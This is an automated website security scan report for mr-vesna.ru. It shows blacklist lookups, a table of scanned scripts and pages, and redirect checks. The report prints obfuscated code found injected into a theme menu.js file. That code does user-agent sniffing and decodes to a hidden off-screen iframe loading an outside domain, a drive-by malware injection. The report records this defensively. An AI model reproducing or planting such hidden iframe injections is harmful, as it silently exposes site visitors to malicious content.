Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mr-vesna.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mr-vesna.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://mr-vesna.ru/ | 200 OK Content-Length: 35114 Content-Type: text/html | clean |
http://mr-vesna.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 95672 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/media/system/js/core.js | 200 OK Content-Length: 4782 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/media/system/js/caption.js | 200 OK Content-Length: 737 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 6573 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var main = 0; if ((main = haystack.indexOf(needle, f_offset)) !== -1) { return main; } return false; } function jjj_lister_ug(){ var brunoSpis = 'iPhone*Macintosh*Linux*iPad*Series40*SymbOS*Flock*SeaMonkey*Nokia*SlimBrowser*AmigaOS*Android*FreeBSD*Chr ...[3726 bytes skipped]... Decoded script: ...[13130 bytes skipped]... tion(el){optText=' '+el.getElements('span.menu-title')[0].get('text');optSub=el.getParents('ul').hasClass('sp-menu');len=optSub.length;dash;if(el.getParents('ul').hasClass('sp-menu')){dash=Array(len).join('–');optText=dash+optText}opt=new Element('option',{"value":el.href,"html":optText,"selected":el.href==window.location.href});opt.inject(select_box)})}});window.addEvent("domready",function(){new SPMobileMenu({})}) <iframe src="http://wargentrend.tj-mc-server.com.ar/hrtjyrrytgyrtujtj10.html" style="position:absolute;left:-1370px;top:-1370px;" height="140" width="140" name="Netronut"></iframe> | ||
http://mr-vesna.ru/plugins/system/helix/js/equalheight.js | 200 OK Content-Length: 1095 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/plugins/system/helix/js/totop.js | 200 OK Content-Length: 997 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.4.js | 200 OK Content-Length: 2500 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/modules/mod_freeslider_sp1/assets/js/script.js | 200 OK Content-Length: 6695 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/index.php/design-1 | 200 OK Content-Length: 57693 Content-Type: text/html | clean |
http://mr-vesna.ru/modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.1.js | 200 OK Content-Length: 2403 Content-Type: application/x-javascript | clean |
http://mr-vesna.ru/index.php/ | 200 OK Content-Length: 35124 Content-Type: text/html | clean |
http://mr-vesna.ru/index.php/design-1/corporate-style | 200 OK Content-Length: 49183 Content-Type: text/html | clean |
http://mr-vesna.ru/index.php/design-1/ | 200 OK Content-Length: 57442 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mr-vesna.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 23 Aug 2014 09:46:21 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ddad14a53ba13052d9a119d84d134d30=c3gmhcncl5cug3kagpfkth1g52; path=/
X-Powered-By: PHP/5.3.27-pl0-gentoo
GET / HTTP/1.1
Host: mr-vesna.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 23 Aug 2014 09:46:21 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ddad14a53ba13052d9a119d84d134d30=c3gmhcncl5cug3kagpfkth1g52; path=/
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: mr-vesna.ru
Referer: http://www.google.com/search?q=mr-vesna.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mr-vesna.ru
Referer: http://www.google.com/search?q=mr-vesna.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.